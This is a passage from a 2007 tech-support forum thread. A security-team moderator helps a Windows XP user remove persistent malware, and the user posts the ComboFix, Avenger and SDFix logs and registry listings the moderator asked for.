O23 - Service: SymWMI Service (SymWSC) - "C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe"
O23 - Service: Performance Logs and Alerts (SysmonLog) - C:\WINDOWS\system32\smlogsvc.exe
O23 - Service: Telephony (TapiSrv) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Terminal Services (TermService) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Themes - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Distributed Link Tracking Client (TrkWks) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Windows User Mode Driver Framework (UMWdf) - C:\WINDOWS\system32\wdfmgr.exe
O23 - Service: Upload Manager (uploadmgr) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Universal Plug and Play Device Host (upnphost) - C:\WINDOWS\System32\svchost.exe -k LocalService
O23 - Service: Uninterruptible Power Supply (UPS) - C:\WINDOWS\system32\ups.exe
O23 - Service: Volume Shadow Copy (VSS) - C:\WINDOWS\system32\vssvc.exe
O23 - Service: Windows Time (W32Time) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: WAN Miniport (ATW) Service (WANMiniportService) - "C:\WINDOWS\wanmpsvc.exe"
O23 - Service: WebClient - C:\WINDOWS\System32\svchost.exe -k LocalService
O23 - Service: Windows Management Instrumentation (winmgmt) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Portable Media Serial Number Service (WmdmPmSN) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: WMI Performance Adapter (WmiApSrv) - C:\WINDOWS\system32\wbem\wmiapsrv.exe
O23 - Service: Automatic Updates (wuauserv) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Wireless Zero Configuration (WZCSVC) - C:\WINDOWS\System32\svchost.exe -k netsvcs


-- Files created between 2007-02-19 and 2007-03-19 -----------------------------

2007-03-19 21:14:12 0 d--h----- C:\WINDOWS\PIF
2007-03-19 20:55:17 0 --a------ C:\WINDOWS\System32\setup_63032.exe<SETUP_~1.EXE>
2007-03-18 22:27:49 80 --a------ C:\WINDOWS\gmer_uninstall.cmd<GMER_U~1.CMD>
2007-03-18 1233 552 --a------ C:\Combo.bat
2007-03-18 09:51:51 77 --a------ C:\delete.reg
2007-03-13 20:51:18 136 --a------ C:\WINDOWS\System32\dgjun.bat
2007-03-12 18:20:25 491768 --a------ C:\ie6setup.exe
2007-03-11 22:17:35 0 d-------- C:\WINDOWS\System32\ActiveScan<ACTIVE~1>
2007-03-11 09:25:11 0 d-------- C:\Program Files\Java
2007-03-11 09:25:11 0 d-------- C:\Program Files\Common Files\Java
2007-03-11 09:24:21 0 d-------- C:\Documents and Settings\Duane\Application Data\Sun
2007-03-10 11:31:19 0 d-------- C:\Rustbfix
2007-03-08 19:56:44 0 d-------- C:\WINDOWS\ERDNT
2007-03-08 19:33:08 49152 --a------ C:\Documents and Settings\Duane\vfind.exe
2007-03-08 19:33:08 79360 --a------ C:\Documents and Settings\Duane\swxcacls.exe
2007-03-08 19:33:08 123904 --a------ C:\Documents and Settings\Duane\swsc.exe
2007-03-08 19:33:08 140800 --a------ C:\Documents and Settings\Duane\swreg.exe
2007-03-08 19:33:08 8192 --a------ C:\Documents and Settings\Duane\RestartIt.exe<RESTAR~1.EXE>
2007-03-08 19:33:08 6914 --a------ C:\Documents and Settings\Duane\Qoo.bat
2007-03-08 19:33:08 971 --a------ C:\Documents and Settings\Duane\Purity.bat
2007-03-08 19:33:08 39184 --a------ C:\Documents and Settings\Duane\Ntrights.exe
2007-03-08 19:33:08 5074 --a------ C:\Documents and Settings\Duane\NTPBack.exe
2007-03-08 19:33:08 42887 --a------ C:\Documents and Settings\Duane\ntp.exe
2007-03-08 19:33:08 26112 --a------ C:\Documents and Settings\Duane\nircmd.exe
2007-03-08 19:33:08 38400 --a------ C:\Documents and Settings\Duane\moveex.exe
2007-03-08 19:33:08 2304 --a------ C:\Documents and Settings\Duane\Look2Me.bat
2007-03-08 19:33:08 117379 --a------ C:\Documents and Settings\Duane\LIST-C.bat
2007-03-08 19:33:08 181776 --a------ C:\Documents and Settings\Duane\handle.exe
2007-03-08 19:33:08 73728 --a------ C:\Documents and Settings\Duane\FDSV.EXE
2007-03-08 19:33:08 51200 --a------ C:\Documents and Settings\Duane\dumphive.exe
2007-03-08 19:33:08 319415 --a------ C:\Documents and Settings\Duane\Creg.reg
2007-03-08 19:33:08 28672 --a------ C:\Documents and Settings\Duane\catchme.exe
2007-02-24 21:33:14 53248 --a------ C:\WINDOWS\System32\Process.exe
2007-02-24 21:33:08 0 d-------- C:\SmitfraudFix<SMITFR~1>
2007-02-24 10:28:21 19392 --a------ C:\WINDOWS\System32\drivers\avgmfx86.sys
2007-02-24 10:28:21 3968 --a------ C:\WINDOWS\System32\drivers\avgclean.sys
2007-02-21 21:42:30 129 --a------ C:\fix.bat
2007-02-20 23:22:43 0 d-------- C:\Program Files\backups


-- Find3M Report ---------------------------------------------------------------

2007-03-19 21:58:43 0 d-------- C:\Program Files\Hijack This<HIJACK~1>
2007-03-19 21:57:46 0 d-------- C:\Program Files\Mozilla Firefox<MOZILL~1>
2007-03-18 10:52:10 0 d-------- C:\Program Files\Picasa2
2007-03-18 10:50:23 0 d-------- C:\Program Files\Messenger<MESSEN~1>
2007-03-18 10:45:17 0 d-------- C:\Program Files\iTunes
2007-03-18 10:44:01 0 d-------- C:\Program Files\Google
2007-03-18 10:41:36 0 d-------- C:\Program Files\BigFix
2007-03-08 19:47:09 0 d-------- C:\Program Files\Common Files\Symantec Shared<SYMANT~1>
2007-02-25 10:48:59 0 d---s---- C:\Documents and Settings\Duane\Application Data\Microsoft<MICROS~1>
2007-02-24 22:08:44 3762 --a------ C:\WINDOWS\System32\tmp.reg
2007-02-24 10:40:37 0 d-------- C:\Documents and Settings\Duane\Application Data\AVG7
2007-02-24 10:28:12 0 d-------- C:\Program Files\Grisoft
2007-02-20 21:14:12 0 d-------- C:\Program Files\Shockwave.com<SHOCKW~1.COM>
2007-02-13 21:29:11 0 d-------- C:\Program Files\Common Files\Sandlot Shared<SANDLO~1>
2007-02-10 20:00:13 14201 --a------ C:\Program Files\hijackthis.log<HIJACK~1.LOG>
2007-01-28 22:13:42 0 d-------- C:\Program Files\LG Software Innovations<LGSOFT~1>
2007-01-28 22:05:20 0 d-------- C:\Program Files\CloneDVD
2007-01-28 21:28:17 14 --a------ C:\WINDOWS\System32\systeminfo3.dll<SYSTEM~1.DLL>
2007-01-28 21:26:56 0 d-------- C:\Documents and Settings\Duane\Application Data\Vso
2007-01-28 21:26:55 34 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.log
2007-01-28 21:26:41 47360 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.sys
2007-01-28 21:26:41 1144 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.inf
2007-01-28 21:26:41 7176 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.cat
2007-01-28 21:26:41 81920 --a------ C:\Documents and Settings\Duane\Application Data\ezpinst.exe
2007-01-21 15:19:32 0 d-------- C:\Documents and Settings\Duane\Application Data\Lavasoft
2007-01-21 15:19:15 0 d-------- C:\Program Files\Lavasoft
2007-01-21 15:08:15 14612 --a------ C:\Program Files\CWSHREDDER.EXE-2D092FD4.pf<CWSHRE~1.PF>
2007-01-21 15:03:52 532480 --a------ C:\Program Files\cwshredder.exe<CWSHRE~1.EXE>
2007-01-12 18:19:57 0 --a------ C:\WINDOWS\System32\vb2en16.dll
2007-01-11 16:35:33 12800 --a------ C:\WINDOWS\System32\svchost.exe
2007-01-07 18:21:40 1 --a------ C:\WINDOWS\System32\ps.dat
2007-01-07 18:21:40 1 --a------ C:\WINDOWS\System32\cookie.dat
2007-01-07 13:16:52 25600 --a------ C:\WINDOWS\System32\helper.dll
2007-01-04 22:35:41 10660 --a------ C:\WINDOWS\mozver.dat
2007-01-03 20:49:11 5037072 --a------ C:\Program Files\spybotsd14.exe<SPYBOT~1.EXE>
2007-01-01 12:02:40 507 --a------ C:\WINDOWS\EReg077.dat
2006-12-25 16:33:11 23066 --a------ C:\Program Files\plainoldfavorites-0.5.6-fx-windows.xpi<PLAINO~1.XPI>


-- Registry Dump ---------------------------------------------------------------


[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run]
"MSMSGS"="\"C:\\Program Files\\Messenger\\msmsgs.exe\" /background"
"Microsoft Works Update Detection"="c:\\Program Files\\Microsoft Works\\WkDetect.exe"
"swg"="C:\\Program Files\\Google\\GoogleToolbarNotifier\\1.2.1128.5462\\GoogleToolbarNotifier.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run]
"TkBellExe"="\"C:\\Program Files\\Common Files\\Real\\Update_OB\\realsched.exe\" -osboot"
"SSC_UserPrompt"="C:\\Program Files\\Common Files\\Symantec Shared\\Security Center\\UsrPrmpt.exe"
"Ulead AutoDetector"="C:\\Program Files\\Ulead Systems\\Ulead Photo Explorer 8.0 SE Basic\\Monitor.exe"
"HPDJ Taskbar Utility"="C:\\WINDOWS\\System32\\spool\\drivers\\w32x86\\3\\hpztsb10.exe"
"HP Component Manager"="\"C:\\Program Files\\HP\\hpcoretech\\hpcmpmgr.exe\""
"HP Software Update"="\"C:\\Program Files\\Hewlett-Packard\\HP Software Update\\HPWuSchd2.exe\""
"QuickTime Task"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime"
"Picasa Media Detector"="C:\\Program Files\\Picasa2\\PicasaMediaDetector.exe"
"iTunesHelper"="\"C:\\Program Files\\iTunes\\iTunesHelper.exe\""
"AVG7_CC"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgcc.exe /STARTUP"
"OFFICEKB"="C:\\Program Files\\Micro Innovations\\Keyboard\\kbdap32a.EXE"
"FLMOFFICE4DMOUSE"="C:\\Program Files\\Micro Innovations\\Mouse\\mouse32a.exe"
"PC Pitstop Optimize Scheduler"="C:\\Program Files\\PCPitstop\\Optimize\\PCPOptimize.exe -boot"
"SmcService"="C:\\PROGRA~1\\Sygate\\SPF\\smc.exe -startgui"
"SunJavaUpdateSched"="\"C:\\Program Files\\Java\\jre1.6.0\\bin\\jusched.exe\""

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL]
"Installed"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI]
"Installed"="1"
"NoChange"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS]
"Installed"="1"


[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks]
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8}"="AVG Anti-Spyware 7.5"

[HKEY_USERS\.default\software\microsoft\windows\currentversion\run]
"AVG7_Run"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgw.exe /RUNONCE"

[HKEY_USERS\s-1-5-18\software\microsoft\windows\currentversion\run]
"AVG7_Run"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgw.exe /RUNONCE"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll"

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Svchost]
LocalService REG_MULTI_SZ Alerter\0WebClient\0LmHosts\0RemoteRegistry\0upnphost\0SSDPSRV\0\0
NetworkService REG_MULTI_SZ DnsCache\0\0
rpcss REG_MULTI_SZ RpcSs\0\0
imgsvc REG_MULTI_SZ StiSvc\0\0
termsvcs REG_MULTI_SZ TermService\0\0



-- End of ComboScan: finished at 2007-03-19 at 22:02:00 ------------------------
cul8rman is offline  
Old 03-19-2007, 11:20 PM   #67 (permalink)
Assistant Manager, TSF Academy; Moderator/Analyst Security Team
 
 
Join Date: Jan 2005
Location: Ohio
Posts: 26,557
OS: WinXP and Vista


Re: MS Windows XP will not load when connected to internet

Hi,

It's still there--it keeps changing names on us. We need to find the spawning entry.

Let's see if this tool will provide us more info:

Please download SREng.

**You may receive the message "The bandwidth limit for this site has been exceeded"; please keep trying--eventually you'll get through.

1. Extract it to Desktop & double click SREng.exe to run it

2. Select 'Smart Scan' & tick "Verify Digital Signatures"

3. Click on the [Scan] button

4. When finished, click on the [Save Reports] button & save the log to Desktop

5. Attach the log in your next reply. Don't post it.

You may have to rename SREngLOG.log to SREngLOG.txt to upload it.

--------------------------------------------------------

It's after 1am my time, so I'll have to pick this up again tomorrow afternoon. Go ahead and shut your machine down when you're through.
__________________

Member of ASAP since 2005
Member of UNITE since 2006

"It is one life whether we spend it laughing or weeping." "Take the time to laugh--it is the music of the soul."
Ried is offline  
Old 03-20-2007, 07:15 AM   #68 (permalink)
Registered User
 
 
Join Date: Aug 2006
Location: Arizona
Posts: 134
OS: XP


Re: MS Windows XP will not load when connected to internet

Here is the latest log file, attached.

I have left the system up. IE will not load, so hopefully we do not need a Panda scan until I can restart the system; it should work then.

Thanks a lot.
cul8rman is offline  
Old 03-20-2007, 07:17 AM   #69 (permalink)
Registered User
 
 
Join Date: Aug 2006
Location: Arizona
Posts: 134
OS: XP


Re: MS Windows XP will not load when connected to internet

It did not upload as .log; here is the .txt.
Attached Files
File Type: txt SREngLOG.txt (25.1 KB, 2 views)
cul8rman is offline  
Old 03-20-2007, 10:32 AM   #70 (permalink)
Assistant Manager, TSF Academy; Moderator/Analyst Security Team
 
 
Join Date: Jan 2005
Location: Ohio
Posts: 26,557
OS: WinXP and Vista


Re: MS Windows XP will not load when connected to internet

I hope you still have Avenger on your desktop.

Launch Avenger and copy all the text contained in the code box below to your Clipboard by highlighting it and pressing (Ctrl+C):

Quote:
Drivers to unload:

C:\WINDOWS\System32\ntio256.sys

Files to delete:

C:\WINDOWS\System32\ntio256.sys

Note: the above code was created specifically for this user. If you are not this user, do NOT follow these directions as they could damage the workings of your system.


Now, start The Avenger program by clicking on its icon on your desktop.
  • Under "Script file to execute" choose "Input Script Manually".
  • Now click on the Magnifying Glass icon which will open a new window titled "View/edit script"
  • Paste the text copied to clipboard into this window by pressing (Ctrl+V).
  • Click Done
  • Now click on the Green Light to begin execution of the script
  • Answer "Yes" twice when prompted.
4. The Avenger will automatically do the following:
  • It will Restart your computer. ( In cases where the code to execute contains "Drivers to Unload", The Avenger will actually restart your system twice.)
  • On reboot, it will briefly open a black command window on your desktop; this is normal.
  • After the restart, it creates a log file that should open with the results of Avenger’s actions. This log file will be located at C:\avenger.txt
  • The Avenger will also have backed up all the files, etc., that you asked it to delete, and will have zipped them and moved the zip archives to C:\avenger\backup.zip.
5. Please copy/paste the content of c:\avenger.txt into your reply.

-----------------------------------------------------

Restart your system into Safe Mode and run SDFix once again.

-----------------------------------------------------

Run ComboFix.exe

-----------------------------------------------------

Please include the following in your next reply:

c:\avenger.txt
C:\SDFix\Report.txt
ComboFix.txt


How is your system behaving now?
Ried is offline  
Old 03-20-2007, 10:46 PM   #71 (permalink)
Registered User
 
 
Join Date: Aug 2006
Location: Arizona
Posts: 134
OS: XP


Re: MS Windows XP will not load when connected to internet

Color is back, so I have separated the posts with a color line of the process run.

Avenger.txt file

Logfile of The Avenger version 1, by Swandog46
Running from registry key:
\Registry\Machine\System\CurrentControlSet\Services\tkxembmv

*******************

Script file located at: \??\C:\Program Files\lerfqbyh.txt
Script file opened successfully.

Script file read successfully

Backups directory opened successfully at C:\Avenger

*******************

Beginning to process script file:



Registry key \Registry\Machine\System\CurrentControlSet\Services\C:\WINDOWS\System32\ntio256.sys not found!
Unload of driver C:\WINDOWS\System32\ntio256.sys failed!

Could not process line:
C:\WINDOWS\System32\ntio256.sys
Status: 0xc0000034



File C:\WINDOWS\System32\ntio256.sys not found!
Deletion of file C:\WINDOWS\System32\ntio256.sys failed!

Could not process line:
C:\WINDOWS\System32\ntio256.sys
Status: 0xc0000034


Completed script processing.

*******************

Finished! Terminate.

- - - - - - - - - - - - - - - -

Results of Report.txt


SDFix: Version 1.69

Run by Duane - Tue 03/20/2007 @ 20:25:26.98

Microsoft Windows XP [Version 5.1.2600]

Running From: C:\Documents and Settings\Duane\Desktop\SDFix

Safe Mode:
Checking Services:





Restoring Windows Registry Entries
Restoring Default Hosts File


Rebooting...

Normal Mode:
Checking Files:

Below files will be copied to Backups folder then removed:

C:\WINDOWS\system32\i - Deleted
C:\WINDOWS\system32\setup_63032.exe - Deleted



ADS Check:

C:\WINDOWS\system32
No streams found.


Final Check:

Remaining Services:
------------------



Authorized Application Key Export:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"


Remaining Files:
---------------

Backups Folder: - C:\DOCUME~1\Duane\Desktop\SDFix\backups\backups.zip


Checking For Files with Hidden Attributes :

C:\Program Files\Common Files\aolshare\shell\us\shellext.dll
C:\Program Files\Common Files\csshare\shell\us\shellext.dll
C:\My Games\Action Ball\actionball.exe
C:\My Games\Adventure Ball\AdventureBall.exe
C:\My Games\Aqua Pearls\pearls.exe
C:\My Games\Cactus Bruce and the Corporate Monkeys\RealCB12.exe
C:\My Games\Clash 'N Slash\Clash N Slash.exe
C:\My Games\Flying Leo\FlyingLeo.exe
C:\My Games\Icy Spell\IcySpell.exe
C:\My Games\Impact\Impact.exe
C:\My Games\Inspheration\Inspheration.exe
C:\My Games\Jewel of Atlantis\Jewel of Atlantis.exe
C:\My Games\Mirror Magic\mirrormagic.exe
C:\My Games\Mosaic - Tomb of Mystery\Mosaic.exe
C:\My Games\Phlinx to Go\PhlinxToGo.exe
C:\My Games\Rainbow Web\RainbowWeb.exe
C:\My Games\Snowy - Space Trip\SpaceTrip.exe
C:\My Games\Turtle Odyssey\Game.exe
C:\My Games\Wheel of Fortune\Wheel of Fortune.exe
C:\Program Files\America Online 8.0\aolphx.exe
C:\Program Files\America Online 8.0\aoltray.exe
C:\Program Files\America Online 8.0\RBM.exe
C:\Program Files\America Online 8.0\waol.exe
C:\Program Files\America Online 8.0\COMIT\cswitch.exe
C:\Program Files\CompuServe 7.0\csphx.exe
C:\Program Files\CompuServe 7.0\cstray.exe
C:\Program Files\CompuServe 7.0\RBM.exe
C:\Program Files\CompuServe 7.0\wcs2000.exe
C:\Program Files\CompuServe 7.0\COMIT\cswitch.exe
C:\Program Files\Picasa2\setup.exe
C:\WINDOWS\system32\config\system.tmp.LOG

Add/Remove Programs List:

1Click DVD Copy 4.2.9.2
3D Snowy Cottage Screen Saver
Ad-Aware SE Personal
Adobe Acrobat 4.0
Agfa ePhoto CL18 Digital Camera Driver
America Online
AOL Instant Messenger (SM)
AOL Coach Version 1.0(Build:20020823.1)
AVG 7.5
AVG Anti-Spyware 7.5
BadCopy Pro
Belarc Advisor 7.0
BigFix
Calm Before the Storm Screen Saver
Chess Live 4.2
Cinema Tycoon(TM) Gold
CleanUp!
Conexant SoftK56 Modem(M)
CompuServe
Codec Pack - All In 1 6.0.2.7
Cox Online Support Controls
EPSON Printer Software
EZBack-it-up 2.0.1
Fiber Twig 2: Restoration of Magic Garden
Fish Tycoon
Fortune Tiles(TM) Gold
FREE Hi-Q Recorder 1.9
Gem Shop
Google Desktop Search
Gum Droppers
Hexalot
High Flying Act - Interactive Storybook
HijackThis 1.99.1
ICQ
iTunes
Karu
Microsoft Data Access Components KB870669
Lavasoft VX2 Cleaner
LEGO Chess
Macromedia Shockwave Player
CloneDVD 4.0
Micro Innovations Wireless Keyboard
Micro Innovations Wireless Optical Mouse
Mozilla Firefox (2.0.0.3)
MSN Music Assistant
Netscape 6 (6.2.1)
Panda ActiveScan
PC Pitstop Optimize 1.5
Picasa 2
QuickTime
Reader Rabbit 1st Grade
Reader Rabbit 1st Grade(R) Capers on Cloud Nine!(TM)
Reader Rabbit Thinking Adventures Ages 4-6
Reader Rabbit(R) I Can Read! With Phonics
RealArcade
RealPlayer
RegistryFix v3.0
Reader Rabbit's 2nd Grade
Sandlot Games Client Services
Macromedia Flash Player 8
SimCity 3000
Splash
Spybot - Search & Destroy 1.4
IncBack +
SurferNETWORK Player
SyncBackSE
Viewpoint Media Player (Remove Only)
WeatherBug
Winamp (remove only)
Yahoo! Toolbar
Yahoo! Toolbar
Zulu Gems
Microsoft Money 2003
Microsoft Money 2003 System Pack
PC Inspector File Recovery
The Sims Deluxe Edition
Norton WMI Update
Google Toolbar for Internet Explorer
Java(TM) SE Runtime Environment 6
DataRobot Premium
Stomp Backup MyPC
MaxBlast 4
PowerDVD
Windows Backup Utility
EPSON Web-To-Page
Mirror Magic
NetZero For Riverdeep
iTunes
Intel(R) Extreme Graphics Driver
Microsoft Office Excel Viewer 2003
Microsoft Office Word Viewer 2003
Adobe Reader 7.0.7
DV 4100M
HP Software Update
Ulead Photo Express 4.0 SE
Texas Hold 'Em: High Stakes Poker
Ulead Photo Explorer 8.0 SE Basic
Disney's Phonics Quest
Greeting Card Factory Express
Sygate Personal Firewall
Microsoft Works 6.0
HP Deskjet 3740
Realtek AC'97 Audio
Multimedia Keyboard Driver

Finished

------------------------------------------
Results of ComboFix.txt

"Duane" - 07-03-20 21:24:36 Service Pack 1
ComboFix 07-03-15.2 - Running from: "C:\Documents and Settings\Duane\Desktop"

((((((((((((((((((((((((((((((( Files Created from 2007-02-20 to 2007-03-20 ))))))))))))))))))))))))))))))))))


2007-03-20 20:18 <DIR> d-------- C:\avenger
2007-03-19 21:14 <DIR> d--h----- C:\WINDOWS\PIF
2007-03-18 12:06 552 --a------ C:\Combo.bat
2007-03-18 09:51 77 --a------ C:\delete.reg
2007-03-18 09:40 51,955,192 --a------ C:\regedit 3.18.07.reg
2007-03-17 23:47 51,951,606 --a------ C:\Regedit 3.172.07.reg
2007-03-17 09:39 51,944,564 --a------ C:\regedit 3.17.07.reg
2007-03-13 20:51 136 --a------ C:\WINDOWS\system32\dgjun.bat
2007-03-13 19:32 51,995,858 --a------ C:\Regedit 3.13.07.reg
2007-03-12 18:20 491,768 --a------ C:\ie6setup.exe
2007-03-11 22:17 <DIR> d-------- C:\WINDOWS\system32\ActiveScan
2007-03-11 09:25 <DIR> d-------- C:\Program Files\Java
2007-03-11 09:25 <DIR> d-------- C:\Program Files\Common Files\Java
2007-03-11 09:24 <DIR> d-------- C:\DOCUME~1\Duane\APPLIC~1\Sun
2007-03-10 11:31 <DIR> d-------- C:\Rustbfix
2007-03-08 19:33 971 --a------ C:\DOCUME~1\Duane\Purity.bat
2007-03-08 19:33 8,192 --a------ C:\DOCUME~1\Duane\RestartIt.exe
2007-03-08 19:33 79,360 --a------ C:\DOCUME~1\Duane\swxcacls.exe
2007-03-08 19:33 73,728 --a------ C:\DOCUME~1\Duane\FDSV.EXE
2007-03-08 19:33 6,914 --a------ C:\DOCUME~1\Duane\Qoo.bat
2007-03-08 19:33 51,200 --a------ C:\DOCUME~1\Duane\dumphive.exe
2007-03-08 19:33 5,074 --a------ C:\DOCUME~1\Duane\NTPBack.exe
2007-03-08 19:33 49,152 --a------ C:\DOCUME~1\Duane\vfind.exe
2007-03-08 19:33 42,887 --a------ C:\DOCUME~1\Duane\ntp.exe
2007-03-08 19:33 39,184 --a------ C:\DOCUME~1\Duane\Ntrights.exe
2007-03-08 19:33 38,400 --a------ C:\DOCUME~1\Duane\moveex.exe
2007-03-08 19:33 319,415 --a------ C:\DOCUME~1\Duane\Creg.reg
2007-03-08 19:33 28,672 --a------ C:\DOCUME~1\Duane\catchme.exe
2007-03-08 19:33 26,112 --a------ C:\DOCUME~1\Duane\nircmd.exe
2007-03-08 19:33 2,304 --a------ C:\DOCUME~1\Duane\Look2Me.bat
2007-03-08 19:33 181,776 --a------ C:\DOCUME~1\Duane\handle.exe
2007-03-08 19:33 140,800 --a------ C:\DOCUME~1\Duane\swreg.exe
2007-03-08 19:33 123,904 --a------ C:\DOCUME~1\Duane\swsc.exe
2007-03-08 19:33 117,379 --a------ C:\DOCUME~1\Duane\LIST-C.bat
2007-02-24 21:33 53,248 --a------ C:\WINDOWS\system32\Process.exe
2007-02-24 21:33 <DIR> d-------- C:\SmitfraudFix
2007-02-21 21:42 129 --a------ C:\fix.bat
2007-02-20 23:22 <DIR> d-------- C:\Program Files\backups


(((((((((((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))))


2007-03-19 21:58 -------- d-------- C:\Program Files\hijack this
2007-03-18 10:52 -------- d-------- C:\Program Files\picasa2
2007-03-18 10:50 -------- d-------- C:\Program Files\messenger
2007-03-18 10:45 -------- d-------- C:\Program Files\itunes
2007-03-18 10:44 -------- d-------- C:\Program Files\google
2007-03-08 19:47 -------- d-------- C:\Program Files\Common Files\symantec shared
2007-02-24 22:08 3762 --a------ C:\WINDOWS\system32\tmp.reg
2007-02-20 21:14 -------- d-------- C:\Program Files\shockwave.com
2007-02-10 20:00 14201 --a------ C:\Program Files\hijackthis.log
2007-01-28 22:13 -------- d-------- C:\Program Files\lg software innovations
2007-01-28 22:05 -------- d-------- C:\Program Files\clonedvd
2007-01-28 21:28 14 --a------ C:\WINDOWS\system32\systeminfo3.dll
2007-01-28 21:26 81920 --a------ C:\DOCUME~1\Duane\APPLIC~1\ezpinst.exe
2007-01-28 21:26 7176 --a------ C:\DOCUME~1\Duane\APPLIC~1\pcouffin.cat
2007-01-28 21:26 47360 --a------ C:\WINDOWS\system32\drivers\pcouffin.sys
2007-01-28 21:26 47360 --a------ C:\DOCUME~1\Duane\APPLIC~1\pcouffin.sys
2007-01-28 21:26 34 --a------ C:\DOCUME~1\Duane\APPLIC~1\pcouffin.log
2007-01-28 21:26 1144 --a------ C:\DOCUME~1\Duane\APPLIC~1\pcouffin.inf
2007-01-28 21:26 -------- d-------- C:\DOCUME~1\Duane\APPLIC~1\vso
2007-01-21 15:19 -------- d-------- C:\Program Files\lavasoft
2007-01-21 15:19 -------- d-------- C:\DOCUME~1\Duane\APPLIC~1\lavasoft
2007-01-21 15:08 14612 --a------ C:\Program Files\cwshredder.exe-2d092fd4.pf
2007-01-21 15:03 532480 --a------ C:\Program Files\cwshredder.exe
2007-01-12 18:19 0 --a------ C:\WINDOWS\system32\vb2en16.dll
2007-01-11 16:35 12800 --a------ C:\WINDOWS\system32\svchost.exe
2007-01-07 18:21 1 --a------ C:\WINDOWS\system32\ps.dat
2007-01-07 18:21 1 --a------ C:\WINDOWS\system32\cookie.dat
2007-01-07 13:16 25600 --a------ C:\WINDOWS\system32\helper.dll
2007-01-04 22:35 10660 --a------ C:\WINDOWS\mozver.dat
2007-01-03 20:49 5037072 --a------ C:\Program Files\spybotsd14.exe
2007-01-01 12:02 507 --a------ C:\WINDOWS\ereg077.dat
2006-12-25 16:33 23066 --a------ C:\Program Files\plainoldfavorites-0.5.6-fx-windows.xpi


(((((((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))

*Note* empty entries & legit default entries are not shown

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run]
"MSMSGS"="\"C:\\Program Files\\Messenger\\msmsgs.exe\" /background"
"Microsoft Works Update Detection"="c:\\Program Files\\Microsoft Works\\WkDetect.exe"
"swg"="C:\\Program Files\\Google\\GoogleToolbarNotifier\\1.2.1128.5462\\GoogleToolbarNotifier.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run]
"TkBellExe"="\"C:\\Program Files\\Common Files\\Real\\Update_OB\\realsched.exe\" -osboot"
"SSC_UserPrompt"="C:\\Program Files\\Common Files\\Symantec Shared\\Security Center\\UsrPrmpt.exe"
"Ulead AutoDetector"="C:\\Program Files\\Ulead Systems\\Ulead Photo Explorer 8.0 SE Basic\\Monitor.exe"
"HPDJ Taskbar Utility"="C:\\WINDOWS\\System32\\spool\\drivers\\w32x86\\3\\hpztsb10.exe"
"HP Component Manager"="\"C:\\Program Files\\HP\\hpcoretech\\hpcmpmgr.exe\""
"HP Software Update"="\"C:\\Program Files\\Hewlett-Packard\\HP Software Update\\HPWuSchd2.exe\""
"QuickTime Task"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime"
"Picasa Media Detector"="C:\\Program Files\\Picasa2\\PicasaMediaDetector.exe"
"iTunesHelper"="\"C:\\Program Files\\iTunes\\iTunesHelper.exe\""
"AVG7_CC"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgcc.exe /STARTUP"
"OFFICEKB"="C:\\Program Files\\Micro Innovations\\Keyboard\\kbdap32a.EXE"
"FLMOFFICE4DMOUSE"="C:\\Program Files\\Micro Innovations\\Mouse\\mouse32a.exe"
"PC Pitstop Optimize Scheduler"="C:\\Program Files\\PCPitstop\\Optimize\\PCPOptimize.exe -boot"
"SmcService"="C:\\PROGRA~1\\Sygate\\SPF\\smc.exe -startgui"
"SunJavaUpdateSched"="\"C:\\Program Files\\Java\\jre1.6.0\\bin\\jusched.exe\""

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL]
"Installed"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI]
